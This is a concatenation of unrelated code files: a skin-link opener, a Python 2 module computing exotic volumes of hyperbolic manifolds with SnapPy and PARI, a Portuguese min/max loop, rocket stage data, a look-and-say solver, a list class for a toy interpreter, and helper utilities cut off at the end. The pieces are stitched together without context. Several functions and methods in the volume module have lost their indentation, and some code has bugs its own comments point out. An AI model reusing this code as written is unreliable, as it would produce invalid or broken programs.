    sign=i
url=getSkinUrl(sign)
print(i,'的皮肤文件链接为',url)  # "<name>'s skin file link is <url>"
input('\n使用 回车 在浏览器中打开')  # press Enter to open in the browser
webbrowser.open(url)
|
from snappy import Manifold
from cypari import *
from multiprocessing import *
import copy
import sys
from ManifoldIterators import *
from VolumeUtilities import *
def prepare_pvolume_file(maniter, ofilenm, append = False, engine = 'magma', max_secs = 20, sln = 2, retrieve = True, period = 100, separator = ';'):
    """The same as calling get_volume_data(mans).write_to_csv(ofilenm) with the given parameters,
    except output will be written out every period manifolds and logs generated, instead of all at once."""
    ctr = 0
    block = list()
    done = False
    try:
        # NOTE(review): if open() itself raises, `f` is unbound and the
        # finally clause raises NameError -- confirm acceptable.
        if append:
            f = open(ofilenm,'a')
        else:
            f = open(ofilenm,'w')
        while True:
            try:
                block.append(maniter.next())  # Python 2 iterator protocol
                ctr += 1
            except StopIteration:
                done = True
            if ctr == period or done:
                # flush the accumulated block of manifolds to disk
                # NOTE(review): if the iterator was empty, block[0] raises
                # IndexError here -- confirm callers never pass empty iterators.
                print 'Processing '+str(block[0])+' to '+str(block[-1])+'.'
                v = get_volume_data(ForwardingIterator(block.__iter__(),lambda m : str(m)),engine=engine,max_secs=max_secs,sln=sln,retrieve=retrieve)
                v.write_to_csv(f,append=append,separator=separator)
                append = True # we must be appending after the first time
                ctr = 0
                block = list()
            if done:
                break
    finally:
        f.close()
# Count the number of distinct (up to sign) values that are at least EPSILON
def _distinct_abs(vol_list, epsilon = EPSILON):
    # NOTE(review): elements of vol_list are compared to epsilon directly and
    # then passed to pari(); this relies on them being numeric (or on Python
    # 2's permissive mixed-type comparison) -- confirm callers' element type.
    pos = set([abs(pari(v)) for v in vol_list if v >= epsilon]) # remove nonpositive volumes (as distinct is up to sign)
    good = list()
    for v in pos:
        # keep v only if no already-kept value is within epsilon of it
        matches = [u for u in good if abs(v-u) <= epsilon]
        if not matches:
            good.append(v)
    return len(good)
def get_volume_data(man_nms, engine = 'magma', max_secs = 20, retrieve = True, sln = 2, max_itf_degree = MAX_ITF):
    """ Returns a VolumeData object containing exotic volumes for manifolds with the given names
    Volumes' precision is based on pari, so set it there
    set retrieve = False to skip retrieving ptolemy data from files
    set engine = None to skip computing ptolemy data in an engine
    set max_secs to specify how long we will spend computing a given manifolds' data before killing the engine and moving on;
    specifying None means we will never give up (unless something crashes)
    if the engine given crashes, so will IDLE and SnapPy; to avoid this, run this command only from within python scripts.
    Manifolds with more than floor(max_itf_degree/2) distinct volumes to an obstruction class
    will have their data for that obstruction class removed, since this demonstrates an invariant trace field with too high ncp
    Set to None and it will be ignored."""
    #TODO: special case max_secs=None to not bother with processes
    if engine:
        def _use_engine(v,p): # this function will be called in a second process to facilitate time limits
            p.send(v.compute_solutions(engine = engine))
    recs = dict()
    for nm in man_nms:
        try:
            sols = None
            var = Manifold(nm).ptolemy_variety(sln,'all')
            try:
                if retrieve:
                    sols = var.retrieve_decomposition()
                else:
                    raise Exception("Go on and compute")
            except Exception as e: # try using engine
                if engine:
                    # run the engine in a child process so max_secs can be enforced
                    mine, theirs = Pipe(duplex = False)
                    p = Process(target=_use_engine,args=[var,theirs])
                    p.daemon = True
                    p.start()
                    if mine.poll(max_secs): # Here is the time limit stuff
                        sols = mine.recv()
                        p.terminate()
                    else:
                        p.terminate() # give up on this one
                        print 'Computation took too long; skipping '+nm
                        continue
                else:
                    print 'No engine and no data retrieved; skipping '+nm
                    continue
            if sols:
                data = [(c.number_field(),c.solutions(numerical = True).volume_numerical()) for c in sols.flatten()]
                for cl_idx in xrange(len(data)):
                    if data[cl_idx]: # TODO may be trivial since no check here
                        for v in data[cl_idx][1]:
                            # record poly -> volume -> (manifold, obstruction class)
                            recs.setdefault(str(data[cl_idx][0]),dict()).setdefault(str(v),list()).append((nm,cl_idx))
            else:
                print 'Got no solutions; skipping '+nm
        except Exception as e:
            # NOTE(review): in Python 2 this prints only str(e); the
            # "+'; skipping '+nm" suffix is evaluated then discarded --
            # likely meant: print str(e)+'; skipping '+nm
            print(str(e))+'; skipping '+nm
            continue
    for p in recs.keys():
        for v in recs[p].keys():
            # deduplicate (manifold, class) records for each volume
            recs[p][v] = list(set(recs[p][v]))
    return VolumeData(data = recs)
def get_potential_trace_fields(poly,sln=2):
"""Given a minimal polynomial of a trace field, returns a list of minimal polynomials of the potential invariant trace fields."""
pol = pari(poly)
try:
return [str(rec[0].polredabs()) for rec in pol.nfsubfields()[1:] if _knmiss(rec[0].poldegree(),pol.poldegree(),sln=sln)] # poldegree returns int
except: # we want cypari.gen.PariError, but no idea how to reference; fortunately, anything else will just raise again
try:
pol = pol.polredabs()
except: # actually except PariError again
print 'When running trace field '+poly+' polredabs couldn\'t handle it.'
return [poly] # between this return and the above print statement, we should know when the above error happened.
return get_potential_trace_fields(str(pol),sln=sln)
def is_pitf(poly,cand,sln):
    """Return True if `cand` could be a potential invariant trace field of
    the field with minimal polynomial `poly`, judged by degree alone."""
    cand_degree = pari(cand).poldegree()
    full_degree = pari(poly).poldegree()
    return _knmiss(cand_degree, full_degree, sln)
def _knmiss(s,l,n):
if s <= 0 or l <= 0 or n <= 0:
return False
while s < l:
s *= n
return s == l
# Wrapper for manipulating data on pseudo-volumes
class VolumeData:
    """This class is for storage and manipulation of exotic volumes of some manifolds.
    Given a value for data, the constructor makes a VolumeData object wrapping it.
    The datastructure is {poly:{volume:(manifold,obstruction_class_index)}}
    It's usually not necessary to make these yourself; collection and read methods return them for you."""
    # structure: dict poly ---> dict volume ---> [(manifold,obstr_cl)]
    def __init__(self, data = None):
        """Wrap the given volume dictionary (stored by reference, not copied).

        Fixed: the default was the mutable `dict()`, evaluated once at class
        definition time, so every VolumeData() constructed without arguments
        shared -- and mutated -- the same dictionary.
        """
        self.data = data if data is not None else dict()
    def get_polys(self):
        """Returns (as a list of strings) the minimal polynomials of the ptolemy/trace fields for the volumes in this object."""
        # Python 2: keys() returns a list, so callers may mutate self.data while iterating it
        return self.data.keys()
    def get_volumes(self,poly):
        """Returns (as a list of strings) the volumes that occur over the field with the given minimal polynomial."""
        # raises KeyError if poly is unknown; use get_polys() to enumerate valid keys
        return self.data[poly].keys()
    def get_manifolds(self,poly,volume):
        """Returns a list of the names of manifolds that produce the given minimal polynomial/volume pair."""
        # records are (manifold_name, obstruction_class_index) pairs; keep the names only
        return [p[0] for p in self.data[poly][volume]]
    def combine_with(self,other):
        """Returns a VolumeData object containing the data from self and other; in case of a conflict (which should not occur),
        the other's data takes precedence."""
        # NOTE(review): records from `other` are appended to (deep-copied)
        # records from self rather than replacing them, so nothing actually
        # takes "precedence" -- confirm the docstring's claim.
        new_data = copy.deepcopy(self.data)
        for p in other.get_polys():
            for v in other.get_volumes(p):
                new_data.setdefault(p,dict()).setdefault(v,list()).extend(other.data[p][v])
        return VolumeData(data = new_data)
    # given an (open, ready to write) file object or valid filename, writes the data
    def write_to_csv(self, output_file, separator = ';', append = False):
        """Writes out the data to output_file, provided output_file is a valid (open, ready to write) File object or filename."""
        f = None
        try:
            if type(output_file) == str:
                if append:
                    f = open(output_file,'a')
                else:
                    f = open(output_file,'w')
            else:
                f = output_file
            if not append:
                # header row; all fields are double-quoted and `separator`-delimited
                f.write('"TraceField"'+separator+'"Volume"'+separator+'"Manifold"'+separator+'"ObstructionClass"'+'\n')
            for p in self.get_polys():
                for v in self.get_volumes(p):
                    for rec in self.data[p][v]:
                        # one row per (manifold, obstruction class) record
                        f.write('"'+p+'"'+separator)
                        f.write('"'+v+'"'+separator)
                        f.write('"'+rec[0]+'"'+separator)
                        f.write('"'+str(rec[1])+'"\n')
        finally:
            # only close handles we opened ourselves; caller-owned files stay open
            if type(output_file) == str and f:
                f.close()
    def filter_fields(self, maxsfdegree=MAX_ITF, sln = 2):
        """This filter removes some polynomials with no subfields of degree <= maxsfdegree
        it doesn't get them all, but does avoid calling nfsubfields; it is quick and approximate."""
        def _filter(p): # for a double break
            deg = pari(p).poldegree()
            # keep p if any subfield degree 1..maxsfdegree could reach deg
            for n in xrange(maxsfdegree):
                if _knmiss(n+1, deg, sln):
                    return
            del self.data[p]
        for p in self.data.keys():  # keys() is a list copy in Python 2, so deleting while iterating is safe
            _filter(p)
# Remove all volumes that are integral multiples of another volume (including 1*)
# To register as an integral multiple, the decimal part of big/small must be less than epsilon
# Will remove manifolds if all their pvols were integral multiples of other pvols
def cull_volumes(self, epsilon = EPSILON): # code adapted from VolumeProcessing
for poly in self.get_polys():
vols = self.get_volumes(poly)
i = 0
while i < len(vols) - 1:
j = i + 1
while j < len(vols):
try:
if is_int(float(vols[i])/float(vols[j]), epsilon = epsilon) and gen.pari(vols[i] + ' > ' + vols[j]) == 1:
# We have to throw away (culled) manifold names to let all culled manifolds have the same volume
# [j] divides [i] so remove [i]
del self.data[poly][vols.pop(i)]
# i is already effectivley incremented, so we must offset it
i = i-1
break
elif is_int(float(vols[j])/float(vols[i]), epsilon = epsilon):
# this time, remove [j]
del self.data[poly][vols.pop(i)]
# j is effectivley incremented, no need to do it
else:
j += 1
except (ValueError, ZeroDivisionError): # bad quotient; not a linear combination either way so...
j += 1
i += 1
def remove_nonpositive_vols(self, epsilon = EPSILON):
"""Removes any volume less than epsilon"""
for p in self.get_polys():
for v in self.get_volumes(p):
try:
if float(v) < epsilon:
del self.data[p][v]
except: # v was really close to 0
del self.data[p][v]
def filter_distinct_volumes(self, maxsfdegree = MAX_ITF, epsilon = EPSILON):
"""Removes an obstruction class if there are more than floor(maxsfdegree/2) distinct (up to sign) nonzero volumes.
If this condition is met, it means that the invariant trace fields have more than maxsfdegree,
because they have more complex places than that degree could possibly have."""
# This sucks, because we have to get everything by manifold,oc pairs again.
classes = dict() # (m,oc):[(poly,vol)]
ncp = maxsfdegree/2
for p in self.get_polys():
for v in self.get_volumes(p):
for rec in self.data[p][v]:
classes.setdefault(rec,list()).append((p,v))
for rec,l in classes.items():
if _distinct_abs([p[1] for p in l], epsilon = epsilon) > ncp: # too many distinct volumes
for p,v in classes[rec]:
self.data[p][v].remove(rec)
def clean(self, maxsfdegree = MAX_ITF, epsilon = EPSILON, n=2):
"""Runs several methods for decreasing size without losing much information
Set maxsfdegree to None to avoid culling based on subfield degree."""
if maxsfdegree:
self.filter_fields(maxsfdegree = maxsfdegree, sln = n)
self.filter_distinct_volumes(maxsfdegree = maxsfdegree, epsilon = epsilon)
self.remove_nonpositive_vols(epsilon = epsilon)
# Cut down to 1 manifold per poly,vol pair.
def remove_duplicate_manifolds(self):
for p in self.get_polys():
for v in self.get_volumes(p):
self.data[p][v] = [self.data[p][v][0]]
def is_int(fl, epsilon = EPSILON):
    """True when fl lies within epsilon of an integer (approaching from either side)."""
    frac = fl % 1
    return frac < epsilon or (1 - frac) < epsilon
def read_volumedata_csv(infile, separator = ';'):
    """Given an (open, ready to read data) file object or valid filename, reads the file and returns a VolumeData that would write it.

    When a filename is given, the header row is skipped; a pre-opened file
    object is assumed to be positioned past any header already.
    """
    f = None
    try:
        if type(infile) == str:
            f = open(infile,'r')
            f.readline()  # discard the header row produced by write_to_csv
        else:
            f = infile
        data = dict()
        for l in f.readlines():
            # strip quoting, split into [poly, volume, manifold, obstruction]
            w = l.strip('\n').replace('"','').split(separator)
            try:
                data.setdefault(w[0],dict()).setdefault(w[1],list()).append((w[2],int(w[3])))
            except IndexError: # This was initially for debugging, but it can be useful if you grabbed a file while a line was being written
                # BUGFIX: was a Python 2-only print statement; the call form
                # below is valid on both Python 2 and 3 for a single argument.
                print('Malformed Input: '+str(w))
                continue
        return VolumeData(data = data)
    finally:
        if type(infile) == str and f:
            f.close()
|
# Reads integers until the user types 'fim', then reports the largest and
# smallest values entered.
#
# Fixes over the original:
#  * inputs were kept as strings, so comparisons were lexicographic
#    ('9' > '10'); now converted with int() before comparing;
#  * the first two valid inputs were stored unconditionally (first -> menor,
#    second -> maior) regardless of magnitude, and the elif chain could not
#    update both bounds; now every value updates max and min independently;
#  * the final report printed the labels swapped when exactly two numbers
#    had been entered.
maior = None  # largest value seen so far
menor = None  # smallest value seen so far
cont = 0      # count of valid numbers read
while True:
    entr = input('Digite algum número, ou fim para finalizar: ')
    if entr == 'fim':
        break
    try:
        valor = int(entr)
    except ValueError:
        print('Erro de entrada')
        continue  # back to the prompt
    if maior is None or valor > maior:
        maior = valor
    if menor is None or valor < menor:
        menor = valor
    cont += 1
if cont > 0:
    print(f'O maior número é {maior}.')
    print(f'O menor número é {menor}.')
|
from collections import OrderedDict
# Input/output artefacts used by the simulation driver.
jobfile="source/job.txt"
liquiddatafile="source/liquiddata.csv"  # engine data for 'liquid' stages -- presumably rows addressed by 'index'; verify
soliddatafile="source/soliddata.csv"    # engine data for 'solid' stages -- presumably rows addressed by 'index'; verify
postprocfile="source/postproc.txt"
###ROCKETS SETTINGS
# Each rocket maps to an ordered list of stage/burn dicts with the keys:
#   name   - human-readable stage label
#   index  - row index into the liquid/solid data file (assumption -- verify)
#   qty    - number of engines firing for this entry (e.g. Falcon Heavy 9 core
#            + 2x9 booster engines) -- assumption, confirm against data files
#   type   - 'liquid' or 'solid'; selects which data file is consulted
#   tStart/tEnd - burn window, presumably seconds from lift-off (verify)
#   zStart/zEnd - altitude window, presumably metres (verify)
# NOTE(review): OrderedDict is built from a plain dict literal, so insertion
# order is only guaranteed on Python 3.7+.
rockets=OrderedDict({
    "Ariane 5 ECA":[
        {
        'name':"Core stage",
        'index':0,
        'qty':1,
        'type':'liquid',
        'tStart':0,
        'tEnd':540,
        'zStart':0,
        'zEnd':157.7e3,
        },
        {
        'name':"Boosters",
        'index':0,
        'qty':2,
        'type':'solid',
        'tStart':0,
        'tEnd':140,
        'zStart':0,
        'zEnd':66.7e3,
        },
        {
        'name':"Second stage",
        'index':1,
        'qty':1,
        'type':'liquid',
        'tStart':540,
        'tEnd':1485,
        'zStart':157.7e3,
        'zEnd':250e3,
        },
    ],
    "Falcon Heavy":[
        {
        'name':"Core Stage",
        'index':2,
        'qty':9,
        'type':'liquid',
        'tStart':0,
        'tEnd':282,
        'zStart':0,
        'zEnd':92e3,
        },
        {
        'name':"Boosters",
        'index':2,
        'qty':18,
        'type':'liquid',
        'tStart':0,
        'tEnd':162,
        'zStart':0,
        'zEnd':62e3,
        },
        {
        'name':"Second Stage",
        'index':3,
        'qty':1,
        'type':'liquid',
        'tStart':282,
        'tEnd':679,
        'zStart':92e3,
        'zEnd':250e3,
        },
    ],
    "Saturn V":[
        {
        'name':"1st Stage",
        'index':4,
        'qty':5,
        'type':'liquid',
        'tStart':0,
        'tEnd':150.7,
        'zStart':0,
        'zEnd':65e3,
        },
        {
        'name':"2nd Stage",
        'index':5,
        'qty':5,
        'type':'liquid',
        'tStart':150.7,
        'tEnd':517.7,
        'zStart':65e3,
        'zEnd':175e3,
        },
        {
        'name':"3rd Stage - 1st burn",
        'index':6,
        'qty':1,
        'type':'liquid',
        'tStart':517.7,
        'tEnd':673.7,
        'zStart':175e3,
        'zEnd':185e3,
        },
        {
        'name':"3rd Stage - 2nd burn",
        'index':6,
        'qty':1,
        'type':'liquid',
        'tStart':673.7,
        'tEnd':1009.7,
        'zStart':185e3,
        'zEnd':250e3,
        },
    ],
})
|
class Solution(object):
    def XXX(self, n):
        """
        Return the n-th term of the look-and-say (count-and-say) sequence.

        The original encoded each run via chained str.replace tricks
        ('111'->'a', '11'->'d', ...); this version scans runs explicitly.
        Both are equivalent because a look-and-say term starting from '1'
        only ever contains the digits 1-3 in runs of length at most 3.
        :type n: int
        :rtype: str
        """
        term = '1'
        for _ in range(1, n):
            pieces = []
            pos = 0
            while pos < len(term):
                # find the end of the current run of equal digits
                run_end = pos
                while run_end < len(term) and term[run_end] == term[pos]:
                    run_end += 1
                # emit "<count><digit>"
                pieces.append(str(run_end - pos))
                pieces.append(term[pos])
                pos = run_end
            term = ''.join(pieces)
        return term
|
from utils.reporter import runtimeError as _RuntimeError
from utils.tokens import Token as _Token
from utils.tokens import TokenType as _TokenType
from utils.misc import isValNeg as _isValNeg
from native.datastructs.rocketClass import RocketCallable as _RocketCallable
from native.datastructs.rocketClass import RocketInstance as _RocketInstance
from native.datatypes import rocketBoolean as _boolean
from native.datatypes import rocketNumber as _number
class List(_RocketCallable):
    """Native constructor callable: calling it wraps the argument list in a
    fresh RocketList instance."""
    def __init__(self):
        self.callee = 'List'
        self.nature = 'native'
    def arity(self):
        # one argument: the element list
        return 1
    def call(self, obj, args):
        # look up the interpreter's lexeme for the language's nil value
        nin_lexeme = obj.KSL[1][_TokenType.NIN.value]
        return RocketList(args, nin_lexeme)
    def __repr__(self):
        return str(self)
    def __str__(self):
        return "<native type 'List'>"
class RocketList(_RocketInstance):
    """Native 'List' datatype instance.

    Wraps a plain Python list (self.elements) of Rocket values and exposes
    list operations as freshly-built native callables through get().
    """
    def __init__(self, elms, nin_lexeme):
        self.elements = elms  # backing Python list of Rocket values
        self.nature = 'datatype'
        self.kind = "<native type 'List'>"
        self.nin_lexeme = nin_lexeme  # lexeme used to print the language's nil value
    def get(self, name: _Token):
        # Method dispatcher: builds and returns a native callable for the
        # requested list method; unknown names raise at the bottom.
        # Note: 'edna' is what we use to manipulate arity for 'slice' function from '1' to '2'
        if name.lexeme == 'get':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                index = args[0].value
                if index >= len(self.elements):
                    raise _RuntimeError('List', "IndexError: list index out of range")
                # NOTE(review): negative indices pass the check above and fall
                # through to Python's negative indexing -- confirm intended.
                return self.elements[index]
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'get' of list>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'insert':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 2
            def call(interpreter, args):
                # This fn expects input like the standard Python 'insert' list method
                # 'insert(index, item)'
                # It requires two args exactly
                # where if 'index' is -1 it translates to secone to the last not the last
                # to add an item at the end we need to pass the length of the list as the index
                # i.e. [list].insert([list].length(), [item])
                self.elements.insert(args[0].value, args[1])
                return List().call(self, self.elements)
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.nature = 'native'
            rocketCallable.signature = 'List'
            rocketCallable.toString = "<native method 'insert' of List>"
            rocketCallable.insert = True
            return rocketCallable
        if name.lexeme == 'slice':
            rocketCallable = _RocketCallable(self)
            # 'inc' flips arity between slice(start) and slice(start, stop)
            def arity(inc=False):
                if inc:
                    return 2
                return 1
            def call(interpreter, args, inc=False):
                if inc:
                    if args[0].value >= len(self.elements) or args[1].value >= len(self.elements):
                        raise _RuntimeError('List', "IndexError: list index out of range")
                    # Special case
                    if (args[0].value >= args[1].value):
                        return List().call(self, [])
                    else:
                        return List().call(self, self.elements[args[0].value:args[1].value])
                return List().call(self, self.elements[args[0].value:])
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.nature = 'native'
            rocketCallable.signature = 'List'
            rocketCallable.toString = "<native method 'slice' of List>"
            rocketCallable.slice = True
            rocketCallable.inc = False
            return rocketCallable
        if name.lexeme == 'splice':
            rocketCallable = _RocketCallable(self)
            def arity(inc=False):
                if inc:
                    return 2
                return 1
            def call(interpreter, args, inc=False):
                # If initial index is beyond the limit then nothing is returned
                if args[0].value >= len(self.elements):
                    return List().call(self, [])
                removed_list = []
                is_negative_index = False
                if inc:
                    # Please note, if the item count is zero then nothing is returned
                    if args[1].value == 0:
                        return List().call(self, [])
                    # Negative steps return nothing irrespective of the index
                    # ... so we need to perform a negativivty test on the input
                    if _isValNeg(args[1].value):
                        return List().call(self, [])
                    # Handle Positive and negative index
                    # count is always positive
                    # Run positivity test for index to determine behaviour (adapted from test above)
                    if not _isValNeg(args[0].value):
                        removed_list = self.elements[args[0].value:args[0].value + args[1].value:]
                    else:
                        # I.e. when index is negative
                        idx = args[0].value
                        # step is the index of the starting elm to the next subseq. 'n' (args[1]) elms
                        step = (len(self.elements) + args[0].value) + args[1].value
                        removed_list = self.elements[idx:step:]
                        is_negative_index = True
                else:
                    # if only index provided then the entire list from the index to end is returned
                    # NOTE(review): this branch wraps the slice in List().call
                    # already, and the return below wraps it AGAIN; also the
                    # tail computation further down reads args[1], which does
                    # not exist when inc is False (IndexError) -- confirm/fix.
                    removed_list = List().call(self, self.elements[args[0].value:])
                # Remove list items
                # Remember the slices are contiguously stored so we can safely use indexing
                # ... by cutting out the first chunk and last chunk then attaching them (surgically)
                head = self.elements[0:len(self.elements) + args[0].value] if is_negative_index else self.elements[0:args[0].value]
                tail = self.elements[len(self.elements) + args[0].value + args[1].value:] if is_negative_index else self.elements[args[0].value + args[1].value:]
                self.elements = head + tail
                # return removed list slice
                return List().call(self, removed_list)
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.nature = 'native'
            rocketCallable.signature = 'List'
            rocketCallable.toString = "<native method 'splice' of List>"
            rocketCallable.splice = True
            rocketCallable.inc = False
            return rocketCallable
        if (name.lexeme == 'append') or (name.lexeme == 'push'):
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                # Internally add new elm
                self.elements.append(args[0])
                # we return the appended list
                return self
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'append' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'clear':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 0
            def call(interpreter, args):
                self.elements = []
                # return the newly cleared list
                return self
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'clear' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'length':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 0
            def call(interpreter, args):
                if self.notEmpty():
                    return len(self.elements)
                else:
                    return 0
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'length' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'pop':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 0
            def call(interpreter, args):
                if self.notEmpty():
                    # NOTE(review): remove(last) deletes the first element equal
                    # to `last`, not necessarily the final one when the list
                    # contains duplicates -- confirm intended.
                    last = self.elements[-1]
                    self.elements.remove(last)
                    return last
                else:
                    raise _RuntimeError('List', "IndexError: cannot pop empty list")
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'pop' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'remove':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                if self.notEmpty():
                    removed_index = -1
                    # NOTE(review): range(len - 1) never inspects the LAST
                    # element, and the list is mutated while being indexed,
                    # which can skip/overrun elements -- looks like a bug.
                    for i in range(len(self.elements) - 1):
                        if args[0].value == self.elements[i].value:
                            self.elements.remove(self.elements[i])
                            removed_index = i
                    if removed_index == -1:
                        raise _RuntimeError('List', "IndexError: Item not in list")
                    else:
                        return _number.Int().call(self, [removed_index])
                else:
                    raise _RuntimeError('List', "IndexError: cannot remove items from an empty list")
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'remove' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'sort':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 0
            def call(interpreter, args):
                if self.notEmpty():
                    # NOTE(review): sorts the wrapper objects directly; this
                    # requires Rocket values to be orderable -- verify.
                    self.elements.sort()
                    return None
                else:
                    return None
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'sort' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'reverse':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 0
            def call(interpreter, args):
                if self.notEmpty():
                    # internally change and return mutation
                    self.elements.reverse()
                    return self
                else:
                    return List().call(self, [])
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'reverse' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'concat':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                if isinstance(args[0], RocketList):
                    # we return the mutation
                    return List().call(self, self.elements + args[0].elements)
                else:
                    raise _RuntimeError('List', "IndexError: can only concatenate 'List' native type with another 'List'.")
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'concat' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'indexOf':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                if self.notEmpty():
                    for i in range(len(self.elements)):
                        if args[0].value == self.elements[i].value:
                            return _number.Int().call(self, [i])
                    raise _RuntimeError('List', "IndexError: Item not in list")
                else:
                    raise _RuntimeError('List', "IndexError: cannot index from an empty list")
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'indexOf' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'includes':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                if self.notEmpty():
                    for i in range(len(self.elements)):
                        if args[0].value == self.elements[i].value:
                            return _boolean.Bool().call(self, [True])
                    return _boolean.Bool().call(self, [False])
                else:
                    raise _RuntimeError('List', "IndexError: cannot index from an empty list")
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'includes' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        if name.lexeme == 'forEach':
            rocketCallable = _RocketCallable(self)
            def arity():
                return 1
            def call(interpreter, args):
                if self.notEmpty():
                    for item in self.elements: args[0].call(interpreter, [item])
                else:
                    raise _RuntimeError('List', "IndexError: cannot run function on an empty list")
            rocketCallable.arity = arity
            rocketCallable.call = call
            rocketCallable.toString = "<native method 'forEach' of List>"
            rocketCallable.nature = 'native'
            return rocketCallable
        else:
            raise _RuntimeError(name, f"'List' has no method '{name.lexeme}'.")
    def set(self, name, value):
        # Lists are immutable property-wise: only element mutation is allowed.
        raise _RuntimeError(name, "Cannot mutate an List's props")
    def notEmpty(self):
        # True when the backing list holds at least one element.
        if len(self.elements) == 0:
            return False
        return True
    def stringify(self, elm, uncoloured=False):
        # Render one element, with ANSI colouring unless uncoloured is set.
        # NOTE(review): _isType, RocketArray, _list and _string are not
        # imported in this module -- every call into this method would raise
        # NameError as written; confirm the missing imports.
        if (_isType(elm, RocketArray) or _isType(elm, _list.RocketList)):
            return elm.__str__()
        if (_isType(elm, _number.RocketInt) or _isType(elm, _number.RocketFloat)):
            return f'\033[36m{elm}\033[0m' if not uncoloured else str(elm.value)
        if _isType(elm, _string.RocketString):
            return f'\033[32m{elm}\033[0m' if not uncoloured else elm.value
        if _isType(elm, _boolean.Bool):
            return f'\033[1m{elm}\033[0m' if not uncoloured else str(elm.value)
        if type(elm) == type(None):
            return '\033[1m' + self.nin_lexeme + '\033[0m' if not uncoloured else self.nin_lexeme
    def stringifyList(self, list, uncoloured=False):
        # Render the whole list as "[ a, b, c ]".
        result = '[ '
        # if called to display and empty List
        # NOTE(review): the empty case returns a Python list ([]) rather than
        # a string, and the trailing 'else' below is unreachable because the
        # len >= 1 branch covers everything past the len == 0 return.
        if len(list) == 0:
            return []
        if len(list) >= 1:
            for elm in list[0:-1]:
                result += self.stringify(elm, uncoloured) + ", "
            result += f"{self.stringify(list[-1], uncoloured)} ]"
        else:
            result += self.stringify(list[0], uncoloured) + ' ]'
        return result
    def raw_string(self):
        # Uncoloured rendering, used for plain output.
        if len(self.elements) > 0:
            return self.stringifyList(self.elements, True)
        else:
            return '[]'
    def __repr__(self):
        if len(self.elements) >= 1:
            return self.stringifyList(self.elements)
        else:
            return "[]"
    def __str__(self):
        return self.__repr__()
    def __len__(self):
        return len(self.elements)
|
from __future__ import absolute_import, division, print_function
from contextlib import contextmanager
import inspect
import datetime
import tempfile
import os
import numpy as np
def raises(err, lamda):
    """Return True when calling *lamda* raises *err*, False when it returns.

    Any other exception type propagates to the caller.
    """
    try:
        lamda()
    except err:
        return True
    else:
        return False
def expand_tuples(L):
    """
    >>> expand_tuples([1, (2, 3)])
    [(1, 2), (1, 3)]

    >>> expand_tuples([1, 2])
    [(1, 2)]
    """
    # Cartesian expansion: a tuple entry fans out into one result per member.
    if not L:
        return [()]
    head, expanded_rest = L[0], expand_tuples(L[1:])
    if isinstance(head, tuple):
        return [(item,) + rest for rest in expanded_rest for item in head]
    return [(head,) + rest for rest in expanded_rest]
@contextmanager
def tmpfile(extension=''):
    """Context manager yielding the path of a fresh temporary file.

    The file is removed on exit.  BUGFIX: the original yielded outside any
    try/finally, so an exception raised in the with-body skipped cleanup and
    leaked the temp file; the yield is now wrapped in try/finally.
    """
    extension = '.' + extension.lstrip('.')
    handle, filename = tempfile.mkstemp(extension)
    try:
        yield filename
    finally:
        try:
            if os.path.exists(filename):
                os.remove(filename)
        except OSError:  # Sometimes Windows can't close files
            if os.name == 'nt':
                os.close(handle)
            try:
                os.remove(filename)
            except OSError:  # finally give up
                pass
def keywords(func):
    """ Get the argument names of a function

    >>> def f(x, y=2):
    ...     pass

    >>> keywords(f)
    ['x', 'y']
    """
    # For a class, report the arguments of its constructor.
    if isinstance(func, type):
        return keywords(func.__init__)
    # BUGFIX: inspect.getargspec was deprecated since 3.0 and removed in
    # Python 3.11; getfullargspec returns the same .args list and also
    # tolerates annotated / keyword-only signatures.
    return inspect.getfullargspec(func).args
def cls_name(cls):
    """Short display name: bare name for builtins, 'package.Name' otherwise
    (only the top-level package is kept)."""
    module = cls.__module__
    if 'builtin' in module:
        return cls.__name__
    return module.split('.')[0] + '.' + cls.__name__
@contextmanager
def filetext(text, extension='', open=open, mode='wt'):
